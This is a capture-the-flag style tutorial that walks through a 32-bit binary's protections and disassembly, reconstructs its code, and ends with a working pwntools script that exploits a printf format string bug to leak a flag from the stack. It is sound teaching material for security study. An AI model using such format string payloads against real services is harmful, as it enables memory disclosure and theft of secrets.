
Leaking data off the stack using format strings.

This is an exciting binary. It has no canary and no PIE, but it has a secure call to fgets() , meaning we still can't truly stack smash. What can we do?

First Observations

We first notice that it does nothing when we try to run the program. We'll notice later that this is because the binary ensures that a file called flag.txt is sitting in the same directory; otherwise, it will stop execution. We can create a dummy file to get around this. I use the same flag every time:

echo flag{temporary_flag} > flag.txt

This loads in flag{temporary_flag} into the flag file. I use this (1) because it's sufficiently long and looks like a flag I might see, and (2) because it has the flag braces so I can easily find it in memory.

With that out of the way, we can now run the binary. It asks for some input and prints it back to us. Let's dive deeper and check for vulnerable code.

Static Analysis

We can use checksec to see what protections are enabled on the binary:

$ checksec chase
[*] '/home/joybuzzer/Documents/vunrotc/public/03-formats/chase/src/chase'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

As expected, there's nothing super shocking here. No canary, PIE disabled, NX enabled. Shellcode is off the table, but buffer overflows aren't yet.

Checking gdb, we make the following observations:

  • The only function that seems to be made by the user is main().

  • main() calls several interesting functions. The most important of these are fopen(), fgets(), puts(), and printf().

  • There is a call to exit(), but we can assume, based on earlier findings, that this is because the binary checks for the flag file's existence.

Let's try and break this code and reassemble what the C code might look like.

Reassembling the Disassembly

Our first significant call is to fopen(). Based on the man pages, we know that fopen() takes two arguments:

  1. The path name of the file to open

  2. The mode to open the file (typically read/write, bytes/chars, etc.)

Using gdb, we can check the arguments:

(gdb) b *(main+49)
(gdb) r

gdb's GEF will predict the arguments for us:

fopen@plt (
   [sp + 0x0] = 0x0804a00a → "flag.txt",
   [sp + 0x4] = 0x0804a008 → 0x6c660072 ("r"?),
   [sp + 0x8] = 0xffffd574 → 0xffffffff,
   [sp + 0xc] = 0x080491e0 → <main+26> add ebx, 0x2e20

If we didn't have GEF, we could check the stack:

gef➤  x/2wx $esp
0xffffd4f0:	0x0804a00a	0x0804a008
gef➤  x/s 0x0804a00a
0x804a00a:	"flag.txt"
gef➤  x/s 0x0804a008
0x804a008:	"r"

fopen() returns a FILE*, which is eventually stored on the stack at ebp-0xc. There's a check afterward to make sure that its value is not NULL, but we can ignore that for now.

The next call is to fgets(). We can check the arguments in the same way:

fgets@plt (
   [sp + 0x0] = 0xffffd568 → 0xf7ffda40 → 0x00000000,
   [sp + 0x4] = 0x00000064,
   [sp + 0x8] = 0x0804d1a0 → 0xfbad2488

This isn't super helpful to us. We know that fgets() takes three arguments:

  1. The buffer to read into (in this case, 0xf7ffda40)

  2. The number of bytes to read (in this case, 0x64 or 100 bytes)

  3. The file to read from (in this case, 0x0804d1a0)

The first and third ones make little sense until we check the assembly.

   0x08049215 <+79>:	push   DWORD PTR [ebp-0xc]
   0x08049218 <+82>:	push   0x64
   0x0804921a <+84>:	lea    eax,[ebp-0x70]
   0x0804921d <+87>:	push   eax
=> 0x0804921e <+88>:	call   0x8049060 <fgets@plt>

The first parameter is the address of ebp-0x70, which is where we are writing. The second argument is clearly 0x64. The third argument is the value at ebp-0xc, which is the FILE* from fopen().

What does this mean?

This tells us that we're reading 100 bytes from the file into the buffer at ebp-0x70.

None of the puts() calls are really important to us, so we're going to skip those. Then we reach fgets().

   0x08049266 <+160>:	mov    eax,DWORD PTR [ebx-0x4]
   0x0804926c <+166>:	mov    eax,DWORD PTR [eax]
   0x0804926e <+168>:	sub    esp,0x4
   0x08049271 <+171>:	push   eax
   0x08049272 <+172>:	push   0x64
   0x08049274 <+174>:	lea    eax,[ebp-0xd4]
   0x0804927a <+180>:	push   eax
   0x0804927b <+181>:	call   0x8049060 <fgets@plt>

The first argument is the address of ebp-0xd4, which is where we are writing. The second argument is clearly 0x64. The third argument is the value at ebx-0x4.

gef➤  x/3wx $esp
0xffffd4f0:	0xffffd504	0x00000064	0xf7e2a620
gef➤  x/wx 0xf7e2a620
0xf7e2a620 <_IO_2_1_stdin_>:	0xfbad2088

We see that the third argument is stdin, which makes sense because we've been looking for a function that takes keyboard input.

Last, we see that there is a call to printf(). We can check the arguments in the same way:

0x08049286 <+192>:	lea    eax,[ebp-0xd4]
0x0804928c <+198>:	push   eax
0x0804928d <+199>:	call   0x8049050 <printf@plt>

We see that the string that we read from is being passed to printf. This is the format string bug because the string is being directly passed into printf.

Based on all this information, we can reassemble the C code (at least the important parts):

int main(void)
    char flag[100];
    char input[100];
    FILE *fp = fopen("flag.txt", "r");
    fgets(flag, 100, fp);
    fgets(input, 100, stdin);


We know that the flag is being loaded on the stack. It's our job to use the format string bug to find where it is. Without gdb, this would be a very annoying challenge.


You can answer this question by running it. After a certain number of format strings, you'll start to print your own input from the buffer. This makes it hard to decipher what's going on.

We can use gdb to find the flag. If we put the instruction pointer right before the fgets() call that takes from stdin, we can see what's on the stack when we enter the format strings.

gef➤  x/40wx $esp
0xffffd4f0:	0xffffd504	0x00000064	0xf7e2a620	0x080491e0
0xffffd500:	0xf7c184be	0xf7fd0294	0xf7c05674	0xffffd57c
0xffffd510:	0xf7ffdba0	0x00000002	0xf7fbeb20	0x00000001
0xffffd520:	0x00000000	0x00000001	0xf7fbe4a0	0x00000001
0xffffd530:	0x00c00000	0xf7ffdc0c	0xffffd5b4	0x00000000
0xffffd540:	0xf7ffd000	0x00000020	0x00000000	0xffffd5bc
0xffffd550:	0xf7ffdba0	0x00000001	0xf7fbe7b0	0x00000001
0xffffd560:	0x00000000	0x00000001	0x67616c66	0x6d65747b
0xffffd570:	0x61726f70	0x665f7972	0x7d67616c	0xf7fc000a
0xffffd580:	0xf7ffd608	0x00000020	0x00000000	0xffffd780

Here's why we use flag{temporary_flag} as the contents of flag.txt. flag in hex is 0x67616c66. We see that it starts at 0xffffd568, which we can verify:

gef➤  x/s 0xffffd568
0xffffd568:	"flag{temporary_flag}\n"

We count that this starts at the 30th word on the stack. We can verify this using the format specifier in our input:

$ ./chase
Hi, what is your name?

We count that the flag is from words 30 to 36.

Python Processing

Rather than doing this manually, we want to process the data to print out the flag easily. Let's see what this looks like.

The first thing we want to do is build the payload. Rather than typing it manually, we can use format strings to build it for us.

payload = b''
for idx in range(30, 37):
    payload += f'%{idx}$x '.encode()

This code cycles from idx=30 to idx=36 (because range doesn't include the last number). It then uses a format string to put the index in the right place (e.g. %30$x). Because format strings aren't supported in byte strings, we have to use .encode() to convert the string to bytes. Then, we append it to our payload.

Next, we send off the payload and receive the data:

data = p.recvline().strip()

Now, we need to process the data. Let's do this one step at a time

  • We know the data is in word-sized chunks, delimited by spaces.

    data_arr = data.split(b' ')
  • The chunks represent four bytes, meaning that for each two-character chunk, we need to convert this to a byte.

    data_bytes = [binascii.unhexlify(i) for i in data_arr]
  • Each chunk is in little-endian, meaning once we have the bytes, we need to reverse them.

    data_rev = [i[::-1].decode() for i in data_bytes]

This will print our flag! We can do this entire process in one big step:

for item in res.split(b' '):
    print(binascii.unhexlify(item)[::-1].decode(), end='')

Let's think about it:

  • For each item in the split data (i.e. data_arr), it's using binascii.unhexlify to convert the data from a hex to a byte string.

  • From there, we are reversing the data (i.e. [::-1]) and converting it to a string (i.e. .decode()).

  • Finally, we are printing the data without a newline (i.e. end=''). This way, we don't even have to store the data and then worry about using ''.join().

Here is the full exploit:
from pwn import *
import binascii

elf = context.binary = ELF('./chase')
p = remote('', 3300)

payload = b''
for i in range(30, 37):
    payload += f'%{i}$x '.encode()


res = p.recvline().strip()

for item in res.split(b' '):
    print(binascii.unhexlify(item)[::-1].decode(), end='')

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